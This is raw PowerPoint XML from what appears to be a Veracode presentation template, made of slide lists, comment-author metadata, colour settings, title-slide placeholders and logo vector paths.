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424" r:id="rId4"/>
    <p:sldMasterId id="2147484067" r:id="rId5"/>
    <p:sldMasterId id="2147484215" r:id="rId6"/>
    <p:sldMasterId id="2147484324" r:id="rId7"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId32"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId33"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="11332" r:id="rId8"/>
    <p:sldId id="2147473005" r:id="rId9"/>
    <p:sldId id="2147473019" r:id="rId10"/>
    <p:sldId id="2147473020" r:id="rId11"/>
    <p:sldId id="2147473021" r:id="rId12"/>
    <p:sldId id="2147473022" r:id="rId13"/>
    <p:sldId id="2147473023" r:id="rId14"/>
    <p:sldId id="2147473024" r:id="rId15"/>
    <p:sldId id="2147473025" r:id="rId16"/>
    <p:sldId id="2147473026" r:id="rId17"/>
    <p:sldId id="2147473027" r:id="rId18"/>
    <p:sldId id="2147473028" r:id="rId19"/>
    <p:sldId id="2147473029" r:id="rId20"/>
    <p:sldId id="11331" r:id="rId21"/>
    <p:sldId id="2147473031" r:id="rId22"/>
    <p:sldId id="2147473032" r:id="rId23"/>
    <p:sldId id="2147473033" r:id="rId24"/>
    <p:sldId id="2147473034" r:id="rId25"/>
    <p:sldId id="2147473035" r:id="rId26"/>
    <p:sldId id="2147473036" r:id="rId27"/>
    <p:sldId id="2147473037" r:id="rId28"/>
    <p:sldId id="2147473038" r:id="rId29"/>
    <p:sldId id="2147473039" r:id="rId30"/>
    <p:sldId id="2147473030"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1584" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" orient="horz" pos="4008" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="552" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="1992" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" pos="3504" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="7" pos="336" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="8" pos="2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6F82702-2627-CB91-9963-E75D65C5D168}" name="Carol Clark" initials="" userId="S::cclark@Veracode.com::c634f39b-5228-4b6b-bf2b-32c836582918" providerId="AD"/>
  <p188:author id="{CBE31612-4FD3-6E84-654D-4BED0634BE4E}" name="Scott Simpson" initials="" userId="S::ssimpson@Veracode.com::74096205-ba81-49df-b700-c757d4fbce32" providerId="AD"/>
  <p188:author id="{BAE4C921-52F1-3BB2-47A7-7A26219DBA2B}" name="Tim Jarrett" initials="TJ" userId="S::tjarrett@veracode.com::135696ba-d627-4565-ac27-5eb1bc3f5caa" providerId="AD"/>
  <p188:author id="{4FE95035-FFC0-6E33-FB10-DBC38AA005C6}" name="Tim Jarrett" initials="" userId="S::TJarrett@Veracode.com::135696ba-d627-4565-ac27-5eb1bc3f5caa" providerId="AD"/>
  <p188:author id="{2029F747-8FB0-8549-D4F3-E723769E0D79}" name="Kass Buchholz" initials="KB" userId="S::kbuchholz@veracode.com::adf27566-d6d9-4712-b848-5e694152bad7" providerId="AD"/>
  <p188:author id="{A5ED8A48-A105-156E-6E41-3542F6468A62}" name="Marek Vass" initials="MV" userId="S::mvass@veracode.com::ec456bbc-250c-4264-ac5e-0652d04b8728" providerId="AD"/>
  <p188:author id="{6811434F-11A5-08FE-DF8A-A23A18A4E5AF}" name="Jennifer Buckingham" initials="JB" userId="S::jbuckingham@veracode.com::d12bd3dd-d7fe-4948-8150-e200c6d9e414" providerId="AD"/>
  <p188:author id="{DD301D51-8DD2-7B67-166D-47D3BBF5B26C}" name="Tim Jarrett" initials="" userId="S::TJarrett@veracode.com::135696ba-d627-4565-ac27-5eb1bc3f5caa" providerId="AD"/>
  <p188:author id="{2869166F-8A58-2715-C286-FF8B05D84BC8}" name="Brian Roche" initials="BR" userId="S::broche@veracode.com::32fbf802-c519-46d9-979e-63093384d113" providerId="AD"/>
  <p188:author id="{CD30228D-F434-50AB-3DEF-CD5047CB0595}" name="John Smith" initials="" userId="S::jtsmith@veracode.com::ee26eab9-548d-49ea-bf48-4338f9a120e0" providerId="AD"/>
  <p188:author id="{A824FE92-4422-8738-3E57-86851E0D4B49}" name="Eric Swenson" initials="ES" userId="S::eswenson@veracode.com::f9916bc7-45dd-4e9e-bdf5-4079316ab251" providerId="AD"/>
  <p188:author id="{9371FA93-D7CE-64FE-9910-050A68DB1DF9}" name="Carol Clark" initials="CC" userId="S::cclark@veracode.com::c634f39b-5228-4b6b-bf2b-32c836582918" providerId="AD"/>
  <p188:author id="{E7F3D29E-72BB-756B-4AEE-2C9E656C4748}" name="Michael Fraino" initials="MF" userId="S::mfraino@veracode.com::8b2f622e-d950-4b95-ae4b-b57c7251ad8c" providerId="AD"/>
  <p188:author id="{566C1FA1-C74E-2247-FAEB-B4121C807B79}" name="Scott Simpson" initials="SS" userId="S::ssimpson@veracode.com::74096205-ba81-49df-b700-c757d4fbce32" providerId="AD"/>
  <p188:author id="{99E266AA-CA73-C7A9-3D7D-8FFBEC2DB105}" name="Felix Brombacher" initials="FB" userId="S::fbrombacher@veracode.com::1e05da25-a257-45dd-a4bf-9a89cde4b246" providerId="AD"/>
  <p188:author id="{EE250AAE-369F-F5E6-D698-B17E4590178E}" name="Kara Reinsel" initials="KR" userId="S::kreinsel@veracode.com::89b78663-bb86-4a2c-9e65-c3881f0de6c8" providerId="AD"/>
  <p188:author id="{C0D081B5-3DF2-44EF-1595-D12F65C045C3}" name="Gary Schwartz" initials="GS" userId="S::gschwartz@veracode.com::3d20cfee-48a5-4a90-8cd0-1142542c1911" providerId="AD"/>
  <p188:author id="{0DEA11CA-3977-8607-E17D-1DF531693EEF}" name="Christian Dalomba" initials="CD" userId="S::cdalomba@veracode.com::e53d5971-689e-44c2-84cd-66346ee42f88" providerId="AD"/>
  <p188:author id="{69A67DD3-41AA-05A9-BE6D-F425F637827A}" name="Jennifer Buckingham" initials="" userId="S::jbuckingham@Veracode.com::d12bd3dd-d7fe-4948-8150-e200c6d9e414" providerId="AD"/>
  <p188:author id="{AB54DBEB-C277-FEA9-097B-7CCE30A6FD2C}" name="Felix Brombacher" initials="" userId="S::fbrombacher@Veracode.com::1e05da25-a257-45dd-a4bf-9a89cde4b246" providerId="AD"/>
  <p188:author id="{BE1AF3F3-A49B-4E6E-3C34-75EC2D9E7E63}" name="Jennifer Martineau" initials="JM" userId="S::jmartineau@veracode.com::9a8316dd-b937-47ff-a043-01cc97df6931" providerId="AD"/>
  <p188:author id="{A730EDFA-BFD3-58C2-454F-A028A4EB86E9}" name="David Grazio" initials="DG" userId="S::dgrazio@veracode.com::227ab2c6-55ec-4938-b691-c9ae46668988" providerId="AD"/>
  <p188:author id="{0B8D2CFB-CC37-201B-2867-0740E97EDDCE}" name="Kyle Metivier" initials="KM" userId="S::kmetivier@veracode.com::64df2e97-2617-48e2-9e37-f6875b2eedb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A9D9"/>
    <a:srgbClr val="242626"/>
    <a:srgbClr val="363636"/>
    <a:srgbClr val="FFFFFF"/>
    <a:srgbClr val="1DC9BF"/>
    <a:srgbClr val="0398CB"/>
    <a:srgbClr val="2C76B8"/>
    <a:srgbClr val="3C304C"/>
    <a:srgbClr val="0788CB"/>
    <a:srgbClr val="02C1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DF18680-E054-41AD-8BC1-D1AEF772440D}">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266"/>
    <p:restoredTop sz="96966"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="156" d="100"/>
          <a:sy n="156" d="100"/>
        </p:scale>
        <p:origin x="408" y="176"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="1584"/>
        <p:guide orient="horz" pos="4008"/>
        <p:guide orient="horz" pos="552"/>
        <p:guide orient="horz" pos="1992"/>
        <p:guide pos="3504"/>
        <p:guide pos="336"/>
        <p:guide pos="2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21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide14.xml"/><Relationship Id="rId34"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handoutMaster" Target="handoutMasters/handoutMaster1.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viewProps" Target="viewProps.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide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C62585-7FEE-E94C-8050-82F9AC2EE19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261B4A5-EA83-2B43-B072-ACB4D4D9591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AA1E0A-6480-C640-A964-6A5DDE81AC89}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/18/24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{503B2A39-058E-2344-B495-1E5391CB794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2C26DAB-5065-FC4A-BA65-10EC8F54BFF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B4DCB45-8DDF-0940-9DB0-28617B790A1C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184833336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DC839B-E55A-BF4B-94A1-B33648E7CACA}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/18/24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F0E95D-A1EE-1B4D-A086-1541C0E094CB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6018370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3F0E95D-A1EE-1B4D-A086-1541C0E094CB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10478407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4" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto3.wdp"/></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Section_Light_1">
    <p:bg>
      <p:bgPr>
        <a:gradFill flip="none" rotWithShape="1">
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="55A4A4"/>
            </a:gs>
            <a:gs pos="42000">
              <a:srgbClr val="006583"/>
            </a:gs>
            <a:gs pos="80000">
              <a:schemeClr val="tx2"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="16200000" scaled="1"/>
          <a:tileRect/>
        </a:gradFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Logo, icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C79F9FFF-D391-9181-1E57-B793AEE6B1A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="14080" r="25404" b="19511"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4955371" y="-2356"/>
            <a:ext cx="7236629" cy="6860356"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A84587DF-5FFD-028C-B731-1FAC947E84E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="4294967295" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411734" y="5031895"/>
            <a:ext cx="5336993" cy="1022350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Veracode Name &amp; Title</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Veracode Name &amp; Title </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AAF76F4-6ADC-EC4A-9B4B-1F0E5D223F18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="436974" y="2126002"/>
            <a:ext cx="8560721" cy="2232057"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="5400" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" panose="020F0302020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Customer Name &amp; Title</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>Customer Name &amp; Title </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="Graphic 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FA68A0B-E24D-D285-DB54-32B95E623C6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9773864" y="5026636"/>
            <a:ext cx="2418136" cy="1831364"/>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solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="180" name="Group 179">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08660328-1BC6-7021-EE8F-BF098919EE8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="537333" y="675233"/>
            <a:ext cx="2699420" cy="400385"/>
            <a:chOff x="4488107" y="1762031"/>
            <a:chExt cx="1820226" cy="272415"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="181" name="Freeform: Shape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0BD6C27-9E43-8846-B7C0-D9BEFE7B8149}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5603484" y="1762031"/>
              <a:ext cx="360997" cy="272415"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 137160 w 360997"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 272415"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 360997"/>
                <a:gd name="connsiteY1" fmla="*/ 136208 h 272415"/>
                <a:gd name="connsiteX2" fmla="*/ 137160 w 360997"/>
                <a:gd name="connsiteY2" fmla="*/ 272415 h 272415"/>
                <a:gd name="connsiteX3" fmla="*/ 274320 w 360997"/>
                <a:gd name="connsiteY3" fmla="*/ 137160 h 272415"/>
                <a:gd name="connsiteX4" fmla="*/ 137160 w 360997"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 272415"/>
                <a:gd name="connsiteX5" fmla="*/ 137160 w 360997"/>
                <a:gd name="connsiteY5" fmla="*/ 220028 h 272415"/>
                <a:gd name="connsiteX6" fmla="*/ 56198 w 360997"/>
                <a:gd name="connsiteY6" fmla="*/ 136208 h 272415"/>
                <a:gd name="connsiteX7" fmla="*/ 137160 w 360997"/>
                <a:gd name="connsiteY7" fmla="*/ 52388 h 272415"/>
                <a:gd name="connsiteX8" fmla="*/ 218123 w 360997"/>
                <a:gd name="connsiteY8" fmla="*/ 137160 h 272415"/>
                <a:gd name="connsiteX9" fmla="*/ 137160 w 360997"/>
                <a:gd name="connsiteY9" fmla="*/ 220028 h 272415"/>
                <a:gd name="connsiteX10" fmla="*/ 304800 w 360997"/>
                <a:gd name="connsiteY10" fmla="*/ 267653 h 272415"/>
                <a:gd name="connsiteX11" fmla="*/ 304800 w 360997"/>
                <a:gd name="connsiteY11" fmla="*/ 57150 h 272415"/>
                <a:gd name="connsiteX12" fmla="*/ 262890 w 360997"/>
                <a:gd name="connsiteY12" fmla="*/ 57150 h 272415"/>
                <a:gd name="connsiteX13" fmla="*/ 262890 w 360997"/>
                <a:gd name="connsiteY13" fmla="*/ 4763 h 272415"/>
                <a:gd name="connsiteX14" fmla="*/ 304800 w 360997"/>
                <a:gd name="connsiteY14" fmla="*/ 4763 h 272415"/>
                <a:gd name="connsiteX15" fmla="*/ 320040 w 360997"/>
                <a:gd name="connsiteY15" fmla="*/ 4763 h 272415"/>
                <a:gd name="connsiteX16" fmla="*/ 360998 w 360997"/>
                <a:gd name="connsiteY16" fmla="*/ 4763 h 272415"/>
                <a:gd name="connsiteX17" fmla="*/ 360998 w 360997"/>
                <a:gd name="connsiteY17" fmla="*/ 57150 h 272415"/>
                <a:gd name="connsiteX18" fmla="*/ 360998 w 360997"/>
                <a:gd name="connsiteY18" fmla="*/ 215265 h 272415"/>
                <a:gd name="connsiteX19" fmla="*/ 360998 w 360997"/>
                <a:gd name="connsiteY19" fmla="*/ 267653 h 272415"/>
                <a:gd name="connsiteX20" fmla="*/ 304800 w 360997"/>
                <a:gd name="connsiteY20" fmla="*/ 267653 h 272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0997" h="272415">
                  <a:moveTo>
                    <a:pt x="137160" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="61913" y="0"/>
                    <a:pt x="0" y="60960"/>
                    <a:pt x="0" y="136208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="211455"/>
                    <a:pt x="60960" y="272415"/>
                    <a:pt x="137160" y="272415"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212407" y="272415"/>
                    <a:pt x="274320" y="211455"/>
                    <a:pt x="274320" y="137160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="273368" y="60008"/>
                    <a:pt x="213360" y="0"/>
                    <a:pt x="137160" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="137160" y="220028"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="80963" y="220028"/>
                    <a:pt x="56198" y="171450"/>
                    <a:pt x="56198" y="136208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56198" y="100965"/>
                    <a:pt x="80963" y="52388"/>
                    <a:pt x="137160" y="52388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196215" y="52388"/>
                    <a:pt x="218123" y="104775"/>
                    <a:pt x="218123" y="137160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="218123" y="171450"/>
                    <a:pt x="192405" y="220028"/>
                    <a:pt x="137160" y="220028"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="304800" y="267653"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="304800" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262890" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262890" y="4763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304800" y="4763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320040" y="4763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360998" y="4763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360998" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360998" y="215265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360998" y="267653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304800" y="267653"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="00B3E7"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="182" name="Freeform: Shape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB07DB5C-3151-9542-2606-47D4741DE009}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4488107" y="1766793"/>
              <a:ext cx="865822" cy="263842"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 260985 w 865822"/>
                <a:gd name="connsiteY0" fmla="*/ 262890 h 263842"/>
                <a:gd name="connsiteX1" fmla="*/ 412433 w 865822"/>
                <a:gd name="connsiteY1" fmla="*/ 262890 h 263842"/>
                <a:gd name="connsiteX2" fmla="*/ 412433 w 865822"/>
                <a:gd name="connsiteY2" fmla="*/ 210503 h 263842"/>
                <a:gd name="connsiteX3" fmla="*/ 317183 w 865822"/>
                <a:gd name="connsiteY3" fmla="*/ 210503 h 263842"/>
                <a:gd name="connsiteX4" fmla="*/ 317183 w 865822"/>
                <a:gd name="connsiteY4" fmla="*/ 157163 h 263842"/>
                <a:gd name="connsiteX5" fmla="*/ 412433 w 865822"/>
                <a:gd name="connsiteY5" fmla="*/ 157163 h 263842"/>
                <a:gd name="connsiteX6" fmla="*/ 412433 w 865822"/>
                <a:gd name="connsiteY6" fmla="*/ 104775 h 263842"/>
                <a:gd name="connsiteX7" fmla="*/ 317183 w 865822"/>
                <a:gd name="connsiteY7" fmla="*/ 104775 h 263842"/>
                <a:gd name="connsiteX8" fmla="*/ 317183 w 865822"/>
                <a:gd name="connsiteY8" fmla="*/ 52388 h 263842"/>
                <a:gd name="connsiteX9" fmla="*/ 412433 w 865822"/>
                <a:gd name="connsiteY9" fmla="*/ 52388 h 263842"/>
                <a:gd name="connsiteX10" fmla="*/ 412433 w 865822"/>
                <a:gd name="connsiteY10" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX11" fmla="*/ 260985 w 865822"/>
                <a:gd name="connsiteY11" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX12" fmla="*/ 260985 w 865822"/>
                <a:gd name="connsiteY12" fmla="*/ 262890 h 263842"/>
                <a:gd name="connsiteX13" fmla="*/ 123825 w 865822"/>
                <a:gd name="connsiteY13" fmla="*/ 164783 h 263842"/>
                <a:gd name="connsiteX14" fmla="*/ 60008 w 865822"/>
                <a:gd name="connsiteY14" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX15" fmla="*/ 0 w 865822"/>
                <a:gd name="connsiteY15" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX16" fmla="*/ 105728 w 865822"/>
                <a:gd name="connsiteY16" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX17" fmla="*/ 140970 w 865822"/>
                <a:gd name="connsiteY17" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX18" fmla="*/ 246698 w 865822"/>
                <a:gd name="connsiteY18" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX19" fmla="*/ 187643 w 865822"/>
                <a:gd name="connsiteY19" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX20" fmla="*/ 123825 w 865822"/>
                <a:gd name="connsiteY20" fmla="*/ 164783 h 263842"/>
                <a:gd name="connsiteX21" fmla="*/ 720090 w 865822"/>
                <a:gd name="connsiteY21" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX22" fmla="*/ 624840 w 865822"/>
                <a:gd name="connsiteY22" fmla="*/ 252413 h 263842"/>
                <a:gd name="connsiteX23" fmla="*/ 565785 w 865822"/>
                <a:gd name="connsiteY23" fmla="*/ 169545 h 263842"/>
                <a:gd name="connsiteX24" fmla="*/ 627698 w 865822"/>
                <a:gd name="connsiteY24" fmla="*/ 87630 h 263842"/>
                <a:gd name="connsiteX25" fmla="*/ 601980 w 865822"/>
                <a:gd name="connsiteY25" fmla="*/ 22860 h 263842"/>
